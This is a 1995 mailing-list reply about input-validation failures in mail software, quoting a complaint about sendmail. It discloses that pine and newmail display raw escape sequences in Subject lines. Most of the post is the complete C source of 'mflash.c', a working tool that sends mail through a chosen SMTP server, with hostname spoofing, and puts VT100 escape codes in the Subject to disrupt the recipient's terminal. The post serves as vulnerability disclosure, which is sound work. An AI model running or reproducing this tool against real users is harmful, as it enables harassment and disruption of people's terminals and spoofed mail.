On Sat, 25 Feb 1995, Dr. Frederick B. Cohen wrote: > [FLAME ON] > > Note that the sendmail implementations have failed repetedly because > instead of checks for ALLOWABLE sequences, they have checks for NOT > ALLOWED characters, and they allow input for one purpose to be used for > another purpose. Since when do we have email addresses with `|;{(*&'?, > return and newline in them? For that matter, why should we allow for > inputs with 8-bit bytes, ^D, ^Z, or other control, meta, or escape > characters. These are not legitimate email address components and > should not be permitted for this purpose. Oh, and has everyone been made aware of the 'newmail' and 'pine' bugs that allow people to send you escape sequences in the subject line? The program that is being distributed is called 'mflash.c', but telnetting to the mail port is easier. If you put a clear-screen sequence as the subject of a message to yourself, your life will be miserable. The folks at Pine HQ have said they're not thinking of fixing it at present. I didn't inquire at Elm HQ (newmail) or even test 'elm' proper for the problem. ---mflash.c: /* Mail Flash - (C) 1994 CHA0S All Rights Reserved This is a simple program which demonstrates the problem with certain parts of VT100 emulation. Previously similar programs made use of talkd, but a user could stop attempts by simply entering "mesg n". This program sends the "flash" string which will really screw over a terminal in the SUBJECT header of e-mail. E-Mail readers such as pine show you this before you can decide to even delete the mail! Support has been added to choose your own SMTP server for neat-o hostname spoofing. (krad!) */ #include <stdio.h> #include <sys/param.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <stdarg.h> void smtp_connect(char *server); int thesock; /* the socket */ void smtp_connect(char *server) { struct sockaddr_in sin; struct hostent *hp; hp = gethostbyname(server); if (hp==NULL) { printf("Unknown host: %s\n",server); exit(0); } bzero((char*) &sin, sizeof(sin)); bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length); sin.sin_family = hp->h_addrtype; sin.sin_port = htons(25); thesock = socket(AF_INET, SOCK_STREAM, 0); connect(thesock,(struct sockaddr *) &sin, sizeof(sin)); } void main(int argc, char **argv) { char buf[1024]; if (argc != 4) { printf("usage: mflash smtp_server from to\n"); exit(0); } printf("Connecting to SMTP Server %s\n",argv[1]); smtp_connect(argv[1]); printf("Sending Mail Flash To %s\n",argv[3]); sprintf(buf, "helo a\nmail from: %s\nrcpt to: %s\ndata\nSUBJECT: \033c\033(0\033#8\033[1;3r\033[J\033[5m\033[?5h\n.\nquit\n",argv[2],argv[3]); send(thesock, buf, strlen(buf), 0); /* I am not sure how to check when this buffer is done being sent. If you are having any problems increase the sleep time below! */ printf("Sleeping To Make Sure Data Is Sent ...\n"); sleep(3); printf("Done!\n"); } -- Charles Howes -- chowes@helix.net Always tell the truth, then you make it the other bloke's problem! - Sean Connery, 1971